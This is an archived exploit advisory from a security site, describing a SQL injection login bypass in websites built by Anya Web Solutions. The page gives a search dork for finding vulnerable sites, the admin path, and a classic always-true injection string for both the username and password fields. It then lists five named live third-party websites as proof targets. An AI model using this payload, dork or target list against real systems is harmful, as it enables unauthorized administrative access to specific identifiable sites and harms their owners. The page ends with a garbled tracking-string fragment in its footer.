Sites powered by Anya Web Solutions suffer from a remote SQL injection login bypass vulnerability. Note that this advisory has site-specific information.
2b59df0a71ef7b979adc011a7d1b5dc584aad174be05e7645115878d7854fe95#********************************************************************************
# Exploit Title : Anya Web Solutions Login Page Bypass
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.anyawebsolutions.com
#
# Google Dork : intext:"Powered by Anya Web Solutions" inurl:asp
#
# Date: 2013/10/14
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Login page bypass
#
# Location : [Target]/admin
#
# Username :1'or'1'='1
#
# Password :1'or'1'='1
######################
# Proof:
#
# http://www.artsmartdallas.net/admin
#
# http://www.bootglams.com/admin
#
# http://www.rreaf.com/admin
#
# http://www.roboticsafarianimals.com/admin
#
# http://www.raglp.com/admin
#
######################
discovered by : ACC3SS
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed